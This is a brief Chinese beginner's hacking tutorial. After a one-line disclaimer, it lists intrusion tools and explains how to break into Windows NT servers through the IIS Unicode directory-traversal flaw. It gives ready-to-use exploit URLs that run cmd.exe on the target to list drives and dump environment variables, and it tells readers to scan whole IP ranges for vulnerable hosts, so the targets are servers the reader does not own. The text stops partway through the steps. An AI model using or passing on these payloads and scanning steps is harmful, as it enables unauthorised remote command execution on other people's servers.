入侵技术从零开始——《入侵入门》

　　如何能成为一位Hacker？这是很多刚学习入侵的朋友经常会问起的问题。希望下面的文章能够给大家减少一些麻烦。
　　在开始学习之前，我先声明一点，下面的文章仅供大家做技术参考，请各位不要用在非法的地方！
　　
　　一、工具选择
　　没有工具想入侵恐怕是很难的。既然Hacker的前辈已经留下了一大笔“财富”，我们这样的新手又岂有不用的道理？！
　　1.扫描工具类：RangeScan 、流光IV
　　2.Ftp服务器类：unicode 、iCmd
　　3.网页探测类：朔雪
　　4.字典生成类：xkey
　　
　　二、《入侵入门》
　　对初学者来说，利用UNICODE漏洞入侵NT是最容易掌握的了。
　　1.寻找目标
　　通常我们首先利用扫描软件来寻找一个IP段上存在的IIS漏洞的所有目标主机。而实际上，我们经常使用的漏洞只是下面三种
　　（中文版）：http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
　　或（英文版2000）：http://ip/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
　　（英文版）：http://ip/scripts/..%c0%9c../winnt/system32/cmd.exe?/c+dir+c:\
　　按回车后如果目录被列出。既存在unicode漏洞。
　　2.查找IIS的发布目录
　　其实找到存在UNICODE漏洞的服务器并不是一件很容易的事，这就需要我们有耐心，有时运气也是必不可少的。这里我们假设已经找到符合条件的服务器，地址为ip。在浏览器里输入：http://ip/scripts..%c1%1c../winnt/system32/cmd.exe?/c+set（服务器版本不同时上面的命令会有所差别），回车运行。